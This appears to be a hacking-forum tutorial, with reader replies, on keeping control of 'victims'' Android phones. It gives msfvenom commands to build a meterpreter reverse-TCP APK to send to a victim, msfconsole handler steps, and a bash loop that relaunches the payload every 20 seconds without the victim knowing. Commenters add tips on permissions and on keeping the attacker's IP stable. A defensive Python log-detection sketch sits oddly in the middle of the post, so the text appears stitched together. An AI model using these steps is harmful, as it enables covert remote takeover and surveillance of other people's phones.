Hey everyone!
I'm going to show you a way to fix your Android victims even if they close the server app.
Step 1: Make an Android Payload
> msfvenom -p android/meterpreter/reversetcp LHOST=xxx.xxx.xxx LPORT=4444 R > App.apk
lhost = your IP address
Now we have the server file App.apk. Send it to the victim and move to step two.
Step 2: Start Listening
Start your msfconsole and follow:
> msfconsole
> use exploit/multi/handler
> set PAYLOAD android/meterpreter/reversetcp
> set LHOST xxx.xxx.xxx (IP address provided when creating the server file)
> set LPORT 4444
> exploit -j
Step 3: Load the Fixing Script
After step 2 a meterpreter session should be opened, so navigate to where you want to upload the script. I prefer to put it on the sdcard,
so navigate to the sdcard and type:
> upload 'path/to/the/sh/script.sh/
Step 4: Run the Script on the Victim Phone
Type:
> shell
> ls
See where the path of the loaded script is, then:
> sh script.sh
So even if the victim closes the server, it will still be running in the background without him knowing!
-----------------------------------------------------
The script code is:
>>#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done <<
Save it with a .sh extension or download it directly from the link attached.
----------------------------------------------------------
This is my first article. I hope you enjoy it and wait for more!
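Seen from the defender's side, the loop above leaves a regular trace: the same activity, `com.metasploit.stage/.MainActivity`, is started again every 20 seconds. The Python sketch below is an added example, not part of the original post; it assumes `logcat -v threadtime` style output in which each `am start` shows up as an ActivityManager `START` line, and its sample lines, pid/uid values and `com.example.chat` component are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed (time, component) pairs rendered as `logcat -v threadtime` style
# lines; not captured from a real device. The pid/tid/uid values are made up.
_EVENTS = [
    ("10:00:00.120", "com.metasploit.stage/.MainActivity"),
    ("10:00:03.500", "com.example.chat/.Main"),
    ("10:00:20.310", "com.metasploit.stage/.MainActivity"),
    ("10:00:31.040", "com.example.chat/.Main"),
    ("10:00:36.900", "com.example.chat/.Main"),
    ("10:00:40.290", "com.metasploit.stage/.MainActivity"),
    ("10:01:00.350", "com.metasploit.stage/.MainActivity"),
    ("10:01:15.220", "com.example.chat/.Main"),
    ("10:01:20.330", "com.metasploit.stage/.MainActivity"),
]
SAMPLE_LOG = "\n".join(
    f"03-14 {ts}   812   830 I ActivityManager: START u0 "
    f"{{act=android.intent.action.MAIN cmp={comp}}} from uid 10087 on display 0"
    for ts, comp in _EVENTS
)

START_RE = re.compile(
    r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})\s.*?Activity(?:Task)?Manager: "
    r"START u\d+ \{[^}]*?cmp=([^\s}]+)"
)

def periodic_relaunches(log_text, min_starts=4, max_jitter=2.0):
    """Map component -> mean gap (s) for activities restarted on a fixed timer."""
    starts = defaultdict(list)
    for line in log_text.splitlines():
        m = START_RE.match(line)
        if m:
            # Logcat omits the year; pin one so strptime gets a full date.
            ts = datetime.strptime("2000-" + m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            starts[m.group(2)].append(ts)
    flagged = {}
    for comp, times in starts.items():
        if len(times) < min_starts:
            continue  # too few launches to call it a pattern
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # A person opening an app gives irregular gaps; a sleep loop does not.
        if pstdev(gaps) <= max_jitter:
            flagged[comp] = round(mean(gaps), 1)
    return flagged

if __name__ == "__main__":
    for comp, gap in periodic_relaunches(SAMPLE_LOG).items():
        print(f"{comp}: relaunched about every {gap}s")
```

The thresholds `min_starts` and `max_jitter` are illustrative; tune them against a baseline of the device's normal app launches before alerting on the result.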
6 Responses
thanks @ImmortalSoul...too few are working on android hacking...must try
I will "lose my victims" as soon as my external IP address changes anyway.
Won't I?
Don't you need to change the script's permissions before you can execute it on Android? I've had that problem when installing Kali Linux onto my phone and I found two ways around it. Firstly, the script worked when it was executed in the /data/data file, and secondly, if you have root access, "chmod 777 {filename}" always worked.
Thanks for the article
Ninja243
Also, is there any way that I could use DNS with this payload? Google hasn't returned any usable answers yet.
Ninja243
@JOHN BRYCE get noip2 and register on no-ip.com so your external IP will stay stable!
@Ninja243 you can use the payload with a DNS server, but you must put the IP address of the DNS, not the URL to the DNS. And thanks for your reply.